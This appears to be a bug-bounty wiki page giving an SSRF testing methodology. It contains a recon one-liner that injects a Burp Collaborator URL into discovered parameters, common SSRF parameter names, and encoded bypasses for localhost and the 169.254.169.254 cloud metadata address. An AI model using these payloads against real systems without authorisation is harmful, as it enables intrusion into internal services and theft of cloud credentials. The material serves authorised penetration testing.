🚁My SSRF Methodology

SSRF Payload Generator

https://tools.intigriti.io/redirector/

----------------------------------------------------------------

----------------------------------------------------------------

(1) One-Liner SSRFFinding

findomain -t http://testphp.vulnweb.com -q | /root/go/bin/httpx -silent -threads 1000 | /root/go/bin/gau | grep "=" | /root/go/bin/qsreplace http://YourBurpColaborator.net

----------------------------------------------------------------

TOP 10 SSRF Parameters

?dest={target}

?redirect={target}

?uri={target}

?path={target}

?continue={target}

?url={target}

?window={target}

?next={target}

?data={target}

?site={target}

----------------------------------------------------------------

SSRF Bypass list for localhost (127.0.0.1):

http://127.1/

http://0000::1:80/

http://[::]:80/

http://2130706433/

http://whitelisted@127.0.0.1

http://0x7f000001/

http://017700000001

http://0177.00.00.01

Also using a redirect to localhost will often work.

----------------------------------------------------------------

Tips Server Side Request Forgery (SSRF)

Use URLs with embedded credentials (e.g. http://user:pass@target.com) to login on internal http services when exploiting SSRF vulnerability.

----------------------------------------------------------------

Did you find the SSRF, but http://169.254.169.254/ is blacklisted? try http://0xA9FEA9FE/, http://0251.0376.0251.0376/

----------------------------------------------------------------

When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the host header completely. This has worked to bypass several SSRF fixes in the past.

----------------------------------------------------------------

PreviousXML External Entity Injection (XXE)NextLocal File Inclusion (LFI)

Last updated